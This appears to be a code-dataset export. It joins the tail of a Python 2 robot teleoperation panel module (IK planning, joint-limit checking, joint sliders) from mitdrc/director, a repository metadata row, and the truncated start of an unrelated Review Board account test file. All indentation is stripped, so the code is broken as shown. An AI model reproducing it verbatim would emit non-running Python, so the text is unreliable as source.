self.panel.jointTeleop.deactivate()
self.setBaseConstraint('xyz only')
self.setBackConstraint('limited')
self.setLFootConstraint('fixed')
self.setRFootConstraint('fixed')
self.setLHandConstraint('arm fixed')
self.setRHandConstraint('arm fixed')
if side == 'left':
if self.panel.ikPlanner.defaultIkParameters.useCollision != 'none':
self.setLHandConstraint('ee fixed')
else:
self.setLHandConstraint('ee fixed')
elif side == 'right':
if self.panel.ikPlanner.defaultIkParameters.useCollision != 'none':
self.setRHandConstraint('ee fixed')
else:
self.setRHandConstraint('ee fixed')
self.reachTargetObject = reachTargetObject
self.reachSide = side
self.activate()
return self.updateGoalFrame(self.panel.ikPlanner.getHandLink(side), frame)
def finalPosePlanningChanged(self):
if self.getCheckboxState(self.ui.finalPosePlanningOptions):
self.setCheckboxState(self.ui.eeTeleopButton, False)
if self.getFinalPoseGraspingHand() == 'left':
self.ui.lhandCombo.enabled = False
else:
self.ui.rhandCombo.enabled = False
self.deactivate()
self.initFinalPosePlanning()
else:
self.terminateFinalPosePlanning()
self.ui.lhandCombo.enabled = True
self.ui.rhandCombo.enabled = True
def rightGraspingHandButtonClicked(self):
self.ui.rightGraspingHandButton.checked = True
self.ui.leftGraspingHandButton.checked = False
self.terminateFinalPosePlanning()
self.initFinalPosePlanning()
ikplanner.getIkOptions().setProperty('RRT hand', 1)
self.ui.rhandCombo.enabled = False
self.ui.lhandCombo.enabled = True
def leftGraspingHandButtonClicked(self):
self.ui.rightGraspingHandButton.checked = False
self.ui.leftGraspingHandButton.checked = True
self.terminateFinalPosePlanning()
self.initFinalPosePlanning()
ikplanner.getIkOptions().setProperty('RRT hand', 0)
self.ui.rhandCombo.enabled = True
self.ui.lhandCombo.enabled = False
def initFinalPosePlanning(self):
if drcargs.getDirectorConfig()['modelName'] != 'valkyrie':
message = 'Final pose planning is not yet available for %s' % drcargs.getDirectorConfig()['modelName']
QtGui.QMessageBox.warning(app.getMainWindow(), 'Model not supported', message,
QtGui.QMessageBox.Ok)
self.setCheckboxState(self.ui.finalPosePlanningOptions, False)
return
pelvisFrame = self.panel.ikPlanner.robotModel.getLinkFrame(self.panel.ikPlanner.pelvisLink)
t = transformUtils.copyFrame(pelvisFrame)
t.PreMultiply()
if self.getFinalPoseGraspingHand() == 'left':
rotation = [0, 90, -90]
else:
rotation = [0, -90, -90]
t.Concatenate(transformUtils.frameFromPositionAndRPY([0.4,0,0], rotation))
handFactory = HandFactory(self.panel.teleopRobotModel)
handFactory.placeHandModelWithTransform(t, self.panel.teleopRobotModel.views[0],
self.getFinalPoseGraspingHand(), 'Final Pose End Effector', 'planning')
def terminateFinalPosePlanning(self):
finalPoseEE = om.findObjectByName('Final Pose End Effector')
om.removeFromObjectModel(finalPoseEE)
def getFinalPoseGraspingHand(self):
if self.ui.rightGraspingHandButton.checked:
return 'right'
else:
return 'left'
def searchFinalPoseClicked(self):
self.updateConstraints()
self.updateCollisionEnvironment()
frame = om.findObjectByName('Final Pose End Effector frame')
handTransform = transformUtils.copyFrame(frame.transform)
handTransform.PreMultiply()
palmToHand = self.panel.ikPlanner.getPalmToHandLink(self.getFinalPoseGraspingHand())
palmToHand = palmToHand.GetLinearInverse()
handTransform.Concatenate(palmToHand)
endPose, info = self.constraintSet.searchFinalPose(self.getFinalPoseGraspingHand(), handTransform)
if info == 1:
self.panel.showPose(self.constraintSet.endPose)
app.displaySnoptInfo(info)
def onCandidateEndPose(self, msg):
if not self.getCheckboxState(self.ui.finalPosePlanningOptions) and not self.ui.eeTeleopButton.checked:
pose = robotstate.convertStateMessageToDrakePose(msg)
self.panel.showPose(pose)
class PosturePlanShortcuts(object):
def __init__(self, jointController, ikPlanner, planningUtils, widget=None):
self.jointController = jointController
self.ikPlanner = ikPlanner
self.planningUtils = planningUtils
widget = widget or app.getMainWindow()
app.addShortcut(widget, 'Ctrl+Shift+S', self.planStand)
app.addShortcut(widget, 'Ctrl+Shift+N', self.planNominal)
app.addShortcut(widget, 'Ctrl+Shift+L', functools.partial(self.planPreGrasp, 'left'))
app.addShortcut(widget, 'Ctrl+Shift+R', functools.partial(self.planPreGrasp, 'right'))
def planStand(self):
self.ikPlanner.computeStandPlan(self.planningUtils.getPlanningStartPose())
def planNominal(self):
self.ikPlanner.computeNominalPlan(self.planningUtils.getPlanningStartPose())
def planPreGrasp(self, side):
startPose = self.jointController.q # wxm
endPose = self.ikPlanner.getMergedPostureFromDatabase(startPose, 'General', 'arm up pregrasp', side=side)
self.ikPlanner.computePostureGoal(startPose, endPose)
class JointLimitChecker(object):
def __init__(self, robotModel, sensorJointController):
self.robotModel = robotModel
self.sensorJointController = sensorJointController
self.jointLimitsMin = np.array([self.robotModel.model.getJointLimits(jointName)[0] for jointName in robotstate.getDrakePoseJointNames()])
self.jointLimitsMax = np.array([self.robotModel.model.getJointLimits(jointName)[1] for jointName in robotstate.getDrakePoseJointNames()])
self.joints = robotstate.matchJoints('^(?!base_)') # all but base joints
self.inflationAmount = np.radians(0.3)
self.timer = TimerCallback(targetFps=1)
self.timer.callback = self.update
self.warningButton = None
self.action = None
def update(self):
limitData = self.checkJointLimits()
if limitData:
self.notifyUserStatusBar(limitData)
else:
self.clearStatusBarWarning()
def start(self):
self.action.checked = True
self.timer.start()
def stop(self):
self.action.checked = False
self.timer.stop()
def setupMenuAction(self):
self.action = app.addMenuAction('Tools', 'Joint Limit Checker')
self.action.setCheckable(True)
self.action.checked = self.timer.isActive()
self.action.connect('triggered()', self.onActionChanged)
def onActionChanged(self):
if self.action.checked:
self.start()
else:
self.stop()
def clearStatusBarWarning(self):
if self.warningButton:
self.warningButton.deleteLater()
self.warningButton = None
def notifyUserStatusBar(self, limitData):
if self.warningButton:
return
def showDialog():
limitData = self.checkJointLimits()
if limitData:
self.notifyUserDialog(limitData)
self.clearStatusBarWarning()
self.warningButton = QtGui.QPushButton('Joint Limit Warning')
self.warningButton.setStyleSheet("background-color:red")
self.warningButton.connect('clicked()', showDialog)
app.getMainWindow().statusBar().insertPermanentWidget(0, self.warningButton)
def notifyUserDialog(self, limitData):
message = '\n'.join(['%s by %.2f degrees' % (name, np.degrees(epsilon)) for name, epsilon, jointPosition in limitData])
message = 'The following joints have been detected to exceed joint limts specified by the model:\n\n' + message + '\n\n'
message += 'Would to like to update the joint limits used by the planning robot model? If you select no '\
'then the joint limit checker will be disabled (use the Tools menu to re-enable).'
msgBox = QtGui.QMessageBox()
msgBox.setText(message)
msgBox.addButton(QtGui.QPushButton('No'), QtGui.QMessageBox.NoRole)
msgBox.addButton(QtGui.QPushButton('Yes'), QtGui.QMessageBox.YesRole)
choice = msgBox.exec_()
if choice == 0: # No
# don't do anything except close the dialog window
return
else:
self.extendJointLimitsAsExceeded(limitData)
def extendJointLimitsAsExceeded(self, limitData):
# inflate the epsilon
limitData = [(jointName, epsilon+np.sign(epsilon)*self.inflationAmount, jointPosition) for jointName, epsilon, jointPosition in limitData]
# update limits on server
panel.ikPlanner.ikServer.updateJointLimits(limitData)
panel.ikPlanner.plannerPub.updateJointLimits(limitData)
# update limits on checker
for jointName, epsilon, jointPosition in limitData:
limitsArray = self.jointLimitsMin if epsilon < 0 else self.jointLimitsMax
limitsArray[self.toJointIndex(jointName)] += epsilon
def checkJointLimits(self):
limitData = []
for jointName in self.joints:
jointIndex = self.toJointIndex(jointName)
jointPosition = self.sensorJointController.q[jointIndex]
jointMin, jointMax = self.jointLimitsMin[jointIndex], self.jointLimitsMax[jointIndex]
if not (jointMin <= jointPosition <= jointMax):
epsilon = jointPosition - np.clip(jointPosition, jointMin, jointMax)
#print 'detected joint outside limit:', jointName, ' by %.3f degrees' % np.degrees(epsilon)
limitData.append((jointName, epsilon, jointPosition))
return limitData
def toJointIndex(self, jointName):
return robotstate.getDrakePoseJointNames().index(jointName)
class GeneralEndEffectorTeleopPanel(object):
def __init__(self, ikPlanner, teleopPanel, robotStateModel, robotStateJointController):
self.ikPlanner = ikPlanner
self.teleopPanel = teleopPanel
self.robotStateModel = robotStateModel
self.robotStateJointController = robotStateJointController
self.widget = QtGui.QWidget()
l = QtGui.QVBoxLayout(self.widget)
h = QtGui.QHBoxLayout()
l.addLayout(h)
h.addWidget(QtGui.QLabel('End effector:'))
self.endEffectorCombo = QtGui.QComboBox()
h.addWidget(self.endEffectorCombo)
def addButton(name, func):
b = QtGui.QPushButton(name)
b.connect('clicked()', func)
l.addWidget(b)
addButton('start ik', self.startIk)
addButton('end ik', self.endIk)
addButton('plan', self.planIk)
config = drcargs.getDirectorConfig()['endEffectorConfig']
self.endEffectorLinkNames = config['endEffectorLinkNames']
self.graspOffsetFrame = transformUtils.frameFromPositionAndRPY(config['graspOffsetFrame'][0], np.degrees(config['graspOffsetFrame'][1]))
self.fixedJoints = config['fixedJoints']
for linkName in self.endEffectorLinkNames:
self.endEffectorCombo.addItem(linkName)
def planIk(self):
startPoseName = 'reach_start'
endPoseName = 'reach_end'
startPose = self.teleopPanel.planningUtils.getPlanningStartPose()
self.ikPlanner.addPose(startPose, startPoseName)
goalMode = ikplanner.getIkOptions().getProperty('Goal planning mode')
if goalMode == 1:
plan = self.constraintSet.runIkTraj()
else:
plan = self.constraintSet.planEndPoseGoal()
self.teleopPanel.showPlan(plan)
def endIk(self):
self.teleopPanel.hideTeleopModel()
EndEffectorTeleopPanel.removePlanFolder()
def startIk(self, reachGoal=None):
EndEffectorTeleopPanel.removePlanFolder()
ikPlanner = self.ikPlanner
startPoseName = 'reach_start'
endPoseName = 'reach_end'
startPose = self.teleopPanel.planningUtils.getPlanningStartPose()
ikPlanner.addPose(startPose, startPoseName)
endEffectorLinkName = str(self.endEffectorCombo.currentText)
if reachGoal is None:
endEffectorLinkFrame = self.robotStateModel.getLinkFrame(endEffectorLinkName)
assert endEffectorLinkFrame is not None
graspToWorld = vtk.vtkTransform()
graspToWorld.PostMultiply()
graspToWorld.Concatenate(self.graspOffsetFrame)
graspToWorld.Concatenate(endEffectorLinkFrame)
reachGoal = graspToWorld
om.removeFromObjectModel('reach goal')
goalFrame = vis.showFrame(reachGoal, 'reach goal', scale=0.1, parent=EndEffectorTeleopPanel.getConstraintFrameFolder())
goalFrame.setProperty('Edit', True)
constraints = []
for pattern in self.fixedJoints:
constraints.append(ikPlanner.createPostureConstraint(startPoseName, robotstate.matchJoints(pattern)))
constraints.extend(ikPlanner.createPositionOrientationConstraint(endEffectorLinkName, goalFrame, self.graspOffsetFrame, positionTolerance=0.0, angleToleranceInDegrees=0.0))
constraints[-1].tspan = [1.0, 1.0]
constraints[-2].tspan = [1.0, 1.0]
self.constraintSet = ikplanner.ConstraintSet(ikPlanner, constraints, endPoseName, startPoseName)
def onGoalFrameModified(frame):
endPose, info = self.constraintSet.runIk()
self.teleopPanel.showPose(self.constraintSet.endPose)
app.displaySnoptInfo(info)
goalFrame.connectFrameModified(onGoalFrameModified)
onGoalFrameModified(goalFrame)
folder = EndEffectorTeleopPanel.getConstraintFolder()
for i, constraint in enumerate(constraints):
constraintItem = ConstraintItem(constraint)
om.addToObjectModel(constraintItem, parentObj=folder)
class JointTeleopPanel(object):
def __init__(self, panel, jointGroups=None):
self.panel = panel
self.ui = panel.ui
self.ui.jointTeleopButton.connect('clicked()', self.teleopButtonClicked)
self.ui.resetJointsButton.connect('clicked()', self.resetButtonClicked)
self.ui.planButton.connect('clicked()', self.planClicked)
self.timerCallback = TimerCallback()
self.timerCallback.callback = self.onTimerCallback
self.jointLimitsMin = np.array([self.panel.teleopRobotModel.model.getJointLimits(jointName)[0] for jointName in robotstate.getDrakePoseJointNames()])
self.jointLimitsMax = np.array([self.panel.teleopRobotModel.model.getJointLimits(jointName)[1] for jointName in robotstate.getDrakePoseJointNames()])
# this need to be generalized
if 'baseZJointLimits' in drcargs.getDirectorConfig():
baseZLimits = drcargs.getDirectorConfig()['baseZJointLimits']
else: # TODO generalise so the base sliders are deactivated
baseZLimits = [-0.1, 0.1]
self.jointLimitsMin[0:6] = [-0.25, -0.25, baseZLimits[0], -math.radians(20), -math.radians(20), -math.radians(20)]
self.jointLimitsMax[0:6] = [ 0.25 , 0.25, baseZLimits[1], math.radians(20), math.radians(20), math.radians(20)]
if jointGroups is None:
# Add only these joint groups:
telopJointGroupNames = ['Back', 'Base', 'Left Arm', 'Right Arm', 'Neck']
allJointGroups = drcargs.getDirectorConfig()['teleopJointGroups']
jointGroups = []
for jointGroup in allJointGroups:
if jointGroup['name'] in telopJointGroupNames:
jointGroups.append( jointGroup )
self.jointGroups = jointGroups
self.buildTabWidget(jointGroups)
self.startPose = None
self.endPose = None
self.userJoints = {}
self.updateWidgetState()
def buildTabWidget(self, jointGroups):
self.slidersMap = {}
self.labelMap = {}
for group in jointGroups:
groupName = group['name']
joints = group['joints']
labels = group['labels']
if len(labels) != len(joints):
print 'error, joints/labels mismatch for joint group:', name
continue
jointGroupWidget = QtGui.QWidget()
gridLayout = QtGui.QGridLayout(jointGroupWidget)
gridLayout.setColumnStretch(0, 1)
for jointName, labelText in zip(joints, labels):
label = QtGui.QLabel(labelText)
numericLabel = QtGui.QLabel('0.0')
slider = QtGui.QSlider(QtCore.Qt.Vertical)
column = gridLayout.columnCount()
gridLayout.addWidget(label, 0, column)
gridLayout.addWidget(slider, 1, column)
gridLayout.addWidget(numericLabel, 2, column)
self.slidersMap[jointName] = slider
self.labelMap[slider] = numericLabel
if groupName == 'Neck':
def onSendNeckJointPositionGoal():
msg = lcmbotcore.joint_angles_t()
msg.utime = getUtime()
msg.num_joints = len(joints)
msg.joint_name = joints
msg.joint_position = [0] * len(joints)
for i, jointName in enumerate(joints):
jointIndex = self.toJointIndex(jointName)
msg.joint_position[i] = self.getJointValue(jointIndex)
lcmUtils.publish('DESIRED_NECK_ANGLES', msg)
sendNeckJointPositionGoalButton = QtGui.QPushButton('set')
sendNeckJointPositionGoalButton.connect('clicked()', onSendNeckJointPositionGoal)
gridLayout.addWidget(sendNeckJointPositionGoalButton, 3, gridLayout.columnCount())
gridLayout.setColumnStretch(gridLayout.columnCount(), 1)
self.ui.tabWidget.addTab(jointGroupWidget, groupName)
self.signalMapper = QtCore.QSignalMapper()
self.sliderMax = 1000.0
for jointName, slider in self.slidersMap.iteritems():
slider.connect('valueChanged(int)', self.signalMapper, 'map()')
self.signalMapper.setMapping(slider, jointName)
slider.setMaximum(self.sliderMax)
self.signalMapper.connect('mapped(const QString&)', self.sliderChanged)
def planClicked(self):
if not self.ui.jointTeleopButton.checked:
return
self.computeEndPose()
self.generatePlan()
def generatePlan(self):
hasBase = False
for jointIndex, jointValue in self.userJoints.iteritems():
if self.toJointName(jointIndex).startswith('base_'):
hasBase = True
plan = self.panel.ikPlanner.computePostureGoal(self.startPose, self.endPose, feetOnGround=hasBase)
self.panel.showPlan(plan)
def teleopButtonClicked(self):
if self.ui.jointTeleopButton.checked:
self.activate()
else:
self.deactivate()
def activate(self):
self.timerCallback.stop()
self.panel.jointTeleopActivated()
self.resetPose()
self.updateWidgetState()
def deactivate(self):
self.ui.jointTeleopButton.blockSignals(True)
self.ui.jointTeleopButton.checked = False
self.ui.jointTeleopButton.blockSignals(False)
self.timerCallback.stop()
self.panel.jointTeleopDeactivated()
self.updateWidgetState()
def updateWidgetState(self):
enabled = self.ui.jointTeleopButton.checked
for slider in self.slidersMap.values():
slider.setEnabled(enabled)
self.ui.resetJointsButton.setEnabled(enabled)
if not enabled:
self.timerCallback.start()
def resetButtonClicked(self):
self.resetPose()
self.panel.showPose(self.endPose)
def resetPose(self):
self.userJoints = {}
self.computeEndPose()
self.updateSliders()
def onTimerCallback(self):
if not self.ui.tabWidget.visible:
return
self.resetPose()
def toJointIndex(self, jointName):
return robotstate.getDrakePoseJointNames().index(jointName)
def toJointName(self, jointIndex):
return robotstate.getDrakePoseJointNames()[jointIndex]
def toJointValue(self, jointIndex, sliderValue):
assert 0.0 <= sliderValue <= 1.0
jointRange = self.jointLimitsMin[jointIndex], self.jointLimitsMax[jointIndex]
return jointRange[0] + (jointRange[1] - jointRange[0])*sliderValue
def toSliderValue(self, jointIndex, jointValue):
jointRange = self.jointLimitsMin[jointIndex], self.jointLimitsMax[jointIndex]
#if jointValue < jointRange[0] or jointValue > jointRange[1]:
# print 'warning: joint %s value %f is out of expected range [%f, %f]' % (self.toJointName(jointIndex), jointValue, jointRange[0], jointRange[1])
return (jointValue - jointRange[0]) / (jointRange[1] - jointRange[0])
def getSlider(self, joint):
jointName = self.toJointName(joint) if isinstance(joint, int) else joint
return self.slidersMap[jointName]
def computeBaseJointOffsets(self):
if self.panel.ikPlanner.robotNoFeet:
baseReferenceFrame = vtk.vtkTransform()
else:
from director import footstepsdriver
baseReferenceFrame = footstepsdriver.FootstepsDriver.getFeetMidPoint(self.panel.ikPlanner.getRobotModelAtPose(self.startPose))
baseReferenceWorldPos = np.array(baseReferenceFrame.GetPosition())
baseReferenceWorldYaw = math.radians(baseReferenceFrame.GetOrientation()[2])
self.baseJointOffsets = {
'base_x' : baseReferenceWorldPos[0],
'base_y' : baseReferenceWorldPos[1],
'base_z' : baseReferenceWorldPos[2],
'base_yaw' : baseReferenceWorldYaw,
}
def computeEndPose(self):
self.startPose = self.panel.planningUtils.getPlanningStartPose()
self.endPose = self.startPose.copy()
hasBase = False
for jointIndex, jointValue in self.userJoints.iteritems():
jointName = self.toJointName(jointIndex)
self.endPose[jointIndex] = jointValue
if jointName.startswith('base_'):
hasBase = True
if hasBase:
ikPlanner = self.panel.ikPlanner
startPoseName = 'posture_goal_start'
ikPlanner.addPose(self.startPose, startPoseName)
endPoseName = 'posture_goal_end'
ikPlanner.addPose(self.endPose, endPoseName)
jointNamesAll = self.slidersMap.keys()
# remove leg joints
jointNames = []
for name in jointNamesAll:
if not 'leg' in name:
jointNames.append(name)
# uncomment to constraint only joints adjusted by user
#jointNames = [self.toJointName(jointIndex) for jointIndex in sorted(self.userJoints.keys())]
p = ikPlanner.createPostureConstraint(endPoseName, jointNames)
constraints = [p]
constraints.extend(ikPlanner.createFixedFootConstraints(startPoseName))
constraints.append(ikPlanner.createQuasiStaticConstraint())
self.endPose, info = ikPlanner.ikServer.runIk(constraints, ikPlanner.defaultIkParameters, nominalPostureName=startPoseName, seedPostureName='q_end')
app.displaySnoptInfo(info)
def getJointValue(self, jointIndex):
return self.endPose[jointIndex]
def sliderChanged(self, jointName):
slider = self.slidersMap[jointName]
jointIndex = self.toJointIndex(jointName)
jointValue = self.toJointValue(jointIndex, slider.value / float(self.sliderMax))
self.userJoints[jointIndex] = jointValue
if jointName.startswith('base_'):
self.computeBaseJointOffsets()
self.userJoints[jointIndex] += self.baseJointOffsets.get(jointName, 0.0)
self.computeEndPose()
self.panel.showPose(self.endPose)
self.updateLabel(jointName, jointValue)
def updateLabel(self, jointName, jointValue):
slider = self.slidersMap[jointName]
label = self.labelMap[slider]
if jointName in ['base_x', 'base_y', 'base_z']:
label.text = str('%.3f' % jointValue).center(5, ' ')
else:
label.text = str('%.1f' % math.degrees(jointValue)).center(5, ' ')
def updateSliders(self):
baseJointOffsets = None
for jointName, slider in self.slidersMap.iteritems():
jointIndex = self.toJointIndex(jointName)
jointValue = self.getJointValue(jointIndex)
if (self.panel.ikPlanner.fixedBaseArm==False):
if jointName.startswith('base_'):
if baseJointOffsets is None:
baseJointOffsets = self.computeBaseJointOffsets()
jointValue -= self.baseJointOffsets.get(jointName, 0.0)
slider.blockSignals(True)
slider.setValue(self.toSliderValue(jointIndex, jointValue)*self.sliderMax)
slider.blockSignals(False)
self.updateLabel(jointName, jointValue)
class TeleopPanel(object):
def __init__(self, robotStateModel, robotStateJointController, teleopRobotModel, teleopJointController, ikPlanner, manipPlanner, affordanceManager, showPlanFunction, hidePlanFunction, planningUtils):
self.robotStateModel = robotStateModel
self.robotStateJointController = robotStateJointController
self.teleopRobotModel = teleopRobotModel
self.teleopJointController = teleopJointController
self.ikPlanner = ikPlanner
self.manipPlanner = manipPlanner
self.affordanceManager = affordanceManager
self.showPlanFunction = showPlanFunction
self.hidePlanFunction = hidePlanFunction
self.planningUtils = planningUtils
manipPlanner.connectPlanCommitted(self.onPlanCommitted)
loader = QtUiTools.QUiLoader()
uifile = QtCore.QFile(':/ui/ddTeleopPanel.ui')
assert uifile.open(uifile.ReadOnly)
self.widget = loader.load(uifile)
uifile.close()
self.ui = WidgetDict(self.widget.children())
self.ui.postureDatabaseButton.connect('clicked()', self.onPostureDatabaseClicked)
self.endEffectorTeleop = EndEffectorTeleopPanel(self)
self.jointTeleop = JointTeleopPanel(self)
if 'endEffectorConfig' in drcargs.getDirectorConfig():
self.ui.endEffectorTeleopFrame.setVisible(False)
self.generalEndEffectorTeleopPanel = GeneralEndEffectorTeleopPanel(ikPlanner, self, robotStateModel, robotStateJointController)
self.widget.layout().addWidget(self.generalEndEffectorTeleopPanel.widget, 0, 0, 1, 2)
app.addShortcut(app.getMainWindow(), 'Ctrl+Shift+P', self.ui.planButton.click)
PythonQt.dd.ddGroupBoxHider(self.ui.paramsContainer)
PythonQt.dd.ddGroupBoxHider(self.ui.finalPosePlanningOptions)
def onPostureDatabaseClicked(self):
ikplanner.RobotPoseGUIWrapper.initCaptureMethods(self.robotStateJointController, self.teleopJointController)
ikplanner.RobotPoseGUIWrapper.show()
def disableJointTeleop(self):
self.ui.jointTeleopFrame.setEnabled(False)
def disableEndEffectorTeleop(self):
self.ui.endEffectorTeleopFrame.setEnabled(False)
def jointTeleopActivated(self):
self.disableEndEffectorTeleop()
def endEffectorTeleopActivated(self):
self.disableJointTeleop()
def endEffectorTeleopDeactivated(self):
self.hideTeleopModel()
self.enablePanels()
def jointTeleopDeactivated(self):
self.hideTeleopModel()
self.enablePanels()
def enablePanels(self):
self.ui.endEffectorTeleopFrame.setEnabled(True)
self.ui.jointTeleopFrame.setEnabled(True)
def onPlanCommitted(self, plan):
self.hideTeleopModel()
def hideTeleopModel(self):
self.teleopRobotModel.setProperty('Visible', False)
self.robotStateModel.setProperty('Visible', True)
self.robotStateModel.setProperty('Alpha', 1.0)
def showTeleopModel(self):
self.teleopRobotModel.setProperty('Visible', True)
self.robotStateModel.setProperty('Visible', True)
self.robotStateModel.setProperty('Alpha', 0.1)
def showPose(self, pose):
self.teleopJointController.setPose('teleop_pose', pose)
self.hidePlanFunction()
self.showTeleopModel()
def showPlan(self, plan):
self.hideTeleopModel()
self.showPlanFunction(plan)
def extendJointLimitsForTesting(teleopPanel, jointLimitChecker):
# add +/- 3 degrees to joint teleop sliders
jointTeleop = teleopPanel.jointTeleop
extra = np.zeros(len(jointTeleop.jointLimitsMin))
extra += np.deg2rad(3.0)
jointTeleop.jointLimitsMin -= extra
jointTeleop.jointLimitsMax += extra
# add +/- 4 degrees to planner joint limits
limitDataMin = [(name, -np.deg2rad(4.0)) for name in jointLimitChecker.joints]
limitDataMax = [(name, np.deg2rad(4.0)) for name in jointLimitChecker.joints]
teleopPanel.ikPlanner.ikServer.updateJointLimits(limitDataMin)
teleopPanel.ikPlanner.ikServer.updateJointLimits(limitDataMax)
def _getAction():
return app.getToolBarActions()['ActionTeleopPanel']
def addPanelToMainWindow(teleopPanel):
global panel
global dock
panel = teleopPanel
dock = app.addWidgetToDock(panel.widget, action=_getAction())
dock.hide()
def init(robotStateModel, robotStateJointController, teleopRobotModel, teleopJointController, ikPlanner, manipPlanner, affordanceManager, showPlanFunction, hidePlanFunction, planningUtils):
panel = TeleopPanel(robotStateModel, robotStateJointController, teleopRobotModel, teleopJointController, ikPlanner, manipPlanner, affordanceManager, showPlanFunction, hidePlanFunction, planningUtils)
addPanelToMainWindow(panel)
return panel
|
mitdrc/director
|
src/python/director/teleoppanel.py
|
Python
|
bsd-3-clause
| 60,475
|
[
"VTK"
] |
a5de9988f2b42842e9db02a4718e7257a2419e266bf7c81b69aea700c0eca05d
|
from __future__ import unicode_literals
import re
from django.contrib import messages
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.test.client import RequestFactory
from djblets.registries.errors import ItemLookupError, RegistrationError
from djblets.testing.decorators import add_fixtures
from kgb import SpyAgency
from reviewboard.accounts.backends import (AuthBackend, auth_backends,
get_enabled_auth_backends,
INVALID_USERNAME_CHAR_REGEX,
register_auth_backend,
StandardAuthBackend,
unregister_auth_backend)
from reviewboard.accounts.forms.pages import (AccountPageForm,
ChangePasswordForm,
ProfileForm)
from reviewboard.accounts.models import (LocalSiteProfile,
Profile,
ReviewRequestVisit,
Trophy)
from reviewboard.accounts.pages import (AccountPage, get_page_classes,
register_account_page_class,
unregister_account_page_class)
from reviewboard.testing import TestCase
class DummyAuthBackend(AuthBackend):
backend_id = 'dummy'
class AuthBackendTests(TestCase):
"""Testing authentication backends."""
def _get_standard_auth_backend(self):
backend = None
for backend in get_enabled_auth_backends():
# We do not use isinstance here because we specifically want a
# StandardAuthBackend and not an instance of a subclass of it.
if type(backend) is StandardAuthBackend:
break
self.assertIs(type(backend), StandardAuthBackend)
return backend
@add_fixtures(['test_users'])
def test_get_or_create_user_exists(self):
"""Testing StandardAuthBackend.get_or_create_user when the requested
user already exists
"""
original_count = User.objects.count()
user = User.objects.get(username='doc')
backend = self._get_standard_auth_backend()
result = backend.get_or_create_user('doc', None)
self.assertEqual(original_count, User.objects.count())
self.assertEqual(user, result)
def test_get_or_create_user_new(self):
"""Testing StandardAuthBackend.get_or_create_user when the requested
user does not exist
"""
backend = self._get_standard_auth_backend()
self.assertIsInstance(backend, StandardAuthBackend)
user = backend.get_or_create_user('doc', None)
self.assertIsNone(user)
@add_fixtures(['test_users'])
def test_get_user_exists(self):
"""Testing StandardAuthBackend.get_user when the requested user already
exists
"""
user = User.objects.get(username='doc')
backend = self._get_standard_auth_backend()
result = backend.get_user(user.pk)
self.assertEqual(user, result)
def test_get_user_not_exists(self):
"""Testing StandardAuthBackend.get_user when the requested user does
not exist
"""
backend = self._get_standard_auth_backend()
result = backend.get_user(1)
self.assertIsNone(result)
class AuthBackendRegistryTests(TestCase):
@classmethod
def setUpClass(cls):
super(AuthBackendRegistryTests, cls).setUpClass()
auth_backends.reset()
def tearDown(self):
super(AuthBackendRegistryTests, self).tearDown()
auth_backends.reset()
def test_register_auth_backend(self):
"""Testing register_auth_backend"""
starting_set = set(auth_backends)
register_auth_backend(DummyAuthBackend)
self.assertSetEqual(set(auth_backends),
starting_set | {DummyAuthBackend})
def test_unregister_auth_backend(self):
"""Testing unregister_auth_backend"""
starting_set = set(auth_backends)
register_auth_backend(DummyAuthBackend)
unregister_auth_backend(DummyAuthBackend)
self.assertSetEqual(set(auth_backends), starting_set)
class ReviewRequestVisitTests(TestCase):
"""Testing the ReviewRequestVisit model"""
fixtures = ['test_users']
def test_default_visibility(self):
"""Testing default value of ReviewRequestVisit.visibility"""
review_request = self.create_review_request(publish=True)
self.client.login(username='admin', password='admin')
self.client.get(review_request.get_absolute_url())
visit = ReviewRequestVisit.objects.get(
user__username='admin', review_request=review_request.id)
self.assertEqual(visit.visibility, ReviewRequestVisit.VISIBLE)
class ProfileTests(TestCase):
"""Test the Profile model."""
fixtures = ['test_users']
def test_is_profile_visible_with_public(self):
"""Testing User.is_profile_public with public profiles."""
user1 = User.objects.get(username='admin')
user2 = User.objects.get(username='doc')
self.assertTrue(user1.is_profile_visible(user2))
def test_is_profile_visible_with_private(self):
"""Testing User.is_profile_public with private profiles."""
user1 = User.objects.get(username='admin')
user2 = User.objects.get(username='doc')
profile = user1.get_profile()
profile.is_private = True
profile.save()
self.assertFalse(user1.is_profile_visible(user2))
self.assertTrue(user1.is_profile_visible(user1))
user2.is_staff = True
self.assertTrue(user1.is_profile_visible(user2))
@add_fixtures(['test_scmtools', 'test_site'])
def test_is_star_unstar_updating_count_correctly(self):
"""Testing if star, unstar affect review request counts correctly."""
user1 = User.objects.get(username='admin')
profile1 = user1.get_profile()
review_request = self.create_review_request(publish=True)
site_profile = profile1.site_profiles.get(local_site=None)
profile1.star_review_request(review_request)
site_profile = LocalSiteProfile.objects.get(pk=site_profile.pk)
self.assertTrue(review_request in
profile1.starred_review_requests.all())
self.assertEqual(site_profile.starred_public_request_count, 1)
profile1.unstar_review_request(review_request)
site_profile = LocalSiteProfile.objects.get(pk=site_profile.pk)
self.assertFalse(review_request in
profile1.starred_review_requests.all())
self.assertEqual(site_profile.starred_public_request_count, 0)
class AccountPageTests(TestCase):
"""Test account page functionality."""
builtin_pages = set(['settings', 'authentication', 'profile', 'groups',
'api-tokens'])
def tearDown(self):
"""Uninitialize this test case."""
super(AccountPageTests, self).tearDown()
AccountPage.registry.reset()
def test_default_pages(self):
"""Testing default list of account pages."""
page_classes = list(get_page_classes())
self.assertEqual(len(page_classes), len(self.builtin_pages))
page_class_ids = [page_cls.page_id for page_cls in page_classes]
self.assertEqual(set(page_class_ids), self.builtin_pages)
def test_register_account_page_class(self):
"""Testing register_account_page_class."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
register_account_page_class(MyPage)
page_classes = list(get_page_classes())
self.assertEqual(len(page_classes), len(self.builtin_pages) + 1)
self.assertEqual(page_classes[-1], MyPage)
def test_register_account_page_class_with_duplicate(self):
"""Testing register_account_page_class with duplicate page."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
register_account_page_class(MyPage)
with self.assertRaises(RegistrationError):
register_account_page_class(MyPage)
def test_unregister_account_page_class(self):
"""Testing unregister_account_page_class."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
register_account_page_class(MyPage)
unregister_account_page_class(MyPage)
page_classes = list(get_page_classes())
self.assertEqual(len(page_classes), len(self.builtin_pages))
def test_unregister_unknown_account_page_class(self):
"""Testing unregister_account_page_class with unknown page."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
with self.assertRaises(ItemLookupError):
